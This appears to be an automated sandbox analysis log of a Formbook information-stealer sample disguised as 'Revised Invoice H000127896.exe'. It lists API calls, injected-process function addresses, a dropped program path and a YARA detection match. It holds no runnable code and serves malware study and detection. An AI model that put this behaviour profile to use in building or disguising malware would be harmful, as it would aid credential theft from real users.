Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2C00 NtQueryInformationProcess, 5_2_02AB2C00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2DB0 NtEnumerateKey, 5_2_02AB2DB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB2D00 NtSetInformationFile, 5_2_02AB2D00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB3090 NtSetValueKey, 5_2_02AB3090
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB3010 NtOpenDirectoryObject, 5_2_02AB3010
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB3D10 NtOpenProcessToken, 5_2_02AB3D10
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB3D70 NtOpenThread, 5_2_02AB3D70
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02148EB0 NtReadFile, 5_2_02148EB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02148FA0 NtDeleteFile, 5_2_02148FA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02148D40 NtCreateFile, 5_2_02148D40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02149040 NtClose, 5_2_02149040
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_021491B0 NtAllocateVirtualMemory, 5_2_021491B0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00431BE8
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00446313
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044F430 0_2_0044F430
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044EB5F 0_2_0044EB5F
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_040A7280 0_2_040A7280
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004182E3 2_2_004182E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403040 2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042E903 2_2_0042E903
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401210 2_2_00401210
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FB53 2_2_0040FB53
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402370 2_2_00402370
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004164C3 2_2_004164C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FD73 2_2_0040FD73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DDF3 2_2_0040DDF3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E3F0 2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039003E6 2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FA352 2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C02C0 2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F41A2 2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039001AA 2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F81CC 2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830100 2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DA118 2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C8158 2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383C7C0 2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03864750 2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840770 2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385C6E0 2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03900591 2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840535 2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EE4F6 2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E4420 2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F2446 2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F6BD7 2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FAB40 2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383EA80 2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038429A0 2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390A9A6 2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03856962 2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038268B8 2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E8F0 2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384A840 2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03842840 2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038BEFA0 2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03832FC8 2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384CFE0 2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03882F28 2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03860F30 2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E2F30 2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B4F40 2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03852E90 2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FCE93 2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FEEDB 2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FEE26 2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840E59 2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03858DBF 2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383ADE0 2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384AD00 2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DCD1F 2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0CB5 2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03830CF2 2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03840C00 2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0388739A 2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F132D 2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382D34C 2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038452A0 2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385B2C0 2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E12ED 2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384B1B0 2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387516C 2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382F172 2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390B16B 2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EF0CC 2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038470C0 2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F70E9 2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FF0E0 2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FF7B0 2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F16CC 2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03885630 2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DD5B0 2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039095C3 2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F7571 2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FF43F 2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03831460 2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385FB80 2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B5BF0 2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387DBF9 2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FFB76 2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DDAAC 2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03885AA0 2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E1AA3 2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EDAC6 2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FFA49 2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F7A46 2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B3A6C 2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D5910 2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03849950 2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385B950 2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038438E0 2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AD800 2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03841F92 2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FFFB1 2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03803FD2 2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03803FD5 2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FFF09 2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03849EB0 2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385FDC0 2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03843D40 2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F1D5A 2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F7D73 2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FFCF2 2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B9C32 2_2_038B9C32
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5B3A1 4_2_03D5B3A1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D54A31 4_2_03D54A31
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D5D1C1 4_2_03D5D1C1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D737E1 4_2_03D737E1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D52CD1 4_2_03D52CD1
Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe Code function: 4_2_03D54C51 4_2_03D54C51
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B002C0 5_2_02B002C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B20274 5_2_02B20274
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B403E6 5_2_02B403E6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A8E3F0 5_2_02A8E3F0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3A352 5_2_02B3A352
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B12000 5_2_02B12000
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B341A2 5_2_02B341A2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B401AA 5_2_02B401AA
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B381CC 5_2_02B381CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A70100 5_2_02A70100
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B1A118 5_2_02B1A118
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B08158 5_2_02B08158
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A9C6E0 5_2_02A9C6E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A7C7C0 5_2_02A7C7C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A80770 5_2_02A80770
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AA4750 5_2_02AA4750
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B2E4F6 5_2_02B2E4F6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B24420 5_2_02B24420
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B32446 5_2_02B32446
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B40591 5_2_02B40591
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A80535 5_2_02A80535
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A7EA80 5_2_02A7EA80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B36BD7 5_2_02B36BD7
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3AB40 5_2_02B3AB40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A668B8 5_2_02A668B8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AAE8F0 5_2_02AAE8F0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A8A840 5_2_02A8A840
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A82840 5_2_02A82840
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A829A0 5_2_02A829A0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B4A9A6 5_2_02B4A9A6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A96962 5_2_02A96962
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3CE93 5_2_02B3CE93
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A92E90 5_2_02A92E90
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3EEDB 5_2_02B3EEDB
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3EE26 5_2_02B3EE26
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A80E59 5_2_02A80E59
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AFEFA0 5_2_02AFEFA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A8CFE0 5_2_02A8CFE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A72FC8 5_2_02A72FC8
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B22F30 5_2_02B22F30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AC2F28 5_2_02AC2F28
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AA0F30 5_2_02AA0F30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AF4F40 5_2_02AF4F40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B20CB5 5_2_02B20CB5
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A70CF2 5_2_02A70CF2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A80C00 5_2_02A80C00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A98DBF 5_2_02A98DBF
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A7ADE0 5_2_02A7ADE0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A8AD00 5_2_02A8AD00
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B1CD1F 5_2_02B1CD1F
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A852A0 5_2_02A852A0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B212ED 5_2_02B212ED
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A9B2C0 5_2_02A9B2C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AC739A 5_2_02AC739A
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3132D 5_2_02B3132D
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A6D34C 5_2_02A6D34C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3F0E0 5_2_02B3F0E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B370E9 5_2_02B370E9
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A870C0 5_2_02A870C0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B2F0CC 5_2_02B2F0CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A8B1B0 5_2_02A8B1B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AB516C 5_2_02AB516C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A6F172 5_2_02A6F172
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B4B16B 5_2_02B4B16B
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B316CC 5_2_02B316CC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AC5630 5_2_02AC5630
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3F7B0 5_2_02B3F7B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3F43F 5_2_02B3F43F
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A71460 5_2_02A71460
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B1D5B0 5_2_02B1D5B0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B495C3 5_2_02B495C3
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B37571 5_2_02B37571
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AC5AA0 5_2_02AC5AA0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B21AA3 5_2_02B21AA3
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B1DAAC 5_2_02B1DAAC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B2DAC6 5_2_02B2DAC6
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AF3A6C 5_2_02AF3A6C
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B37A46 5_2_02B37A46
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3FA49 5_2_02B3FA49
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A9FB80 5_2_02A9FB80
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02ABDBF9 5_2_02ABDBF9
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AF5BF0 5_2_02AF5BF0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3FB76 5_2_02B3FB76
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A838E0 5_2_02A838E0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AED800 5_2_02AED800
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B15910 5_2_02B15910
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A89950 5_2_02A89950
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A9B950 5_2_02A9B950
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A89EB0 5_2_02A89EB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3FFB1 5_2_02B3FFB1
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A81F92 5_2_02A81F92
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A43FD5 5_2_02A43FD5
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A43FD2 5_2_02A43FD2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3FF09 5_2_02B3FF09
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B3FCF2 5_2_02B3FCF2
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02AF9C32 5_2_02AF9C32
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A9FDC0 5_2_02A9FDC0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B37D73 5_2_02B37D73
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02A83D40 5_2_02A83D40
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02B31D5A 5_2_02B31D5A
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02131950 5_2_02131950
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0212CAB0 5_2_0212CAB0
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0212AB30 5_2_0212AB30
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0212C890 5_2_0212C890
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02133200 5_2_02133200
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_02135020 5_2_02135020
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0214B640 5_2_0214B640
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0293E238 5_2_0293E238
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0293E353 5_2_0293E353
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0293E6EC 5_2_0293E6EC
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0293D758 5_2_0293D758
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_0293C9F8 5_2_0293C9F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02AC7E54 appears 111 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02A6B970 appears 280 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02AEEA12 appears 86 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02AB5130 appears 58 times
Source: C:\Windows\SysWOW64\replace.exe Code function: String function: 02AFF290 appears 105 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: String function: 00445AE0 appears 55 times
Source: Revised Invoice H000127896.exe, 00000000.00000003.2068678336.000000000478D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe
Source: Revised Invoice H000127896.exe, 00000000.00000003.2069987307.0000000003E13000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe
Source: Revised Invoice H000127896.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
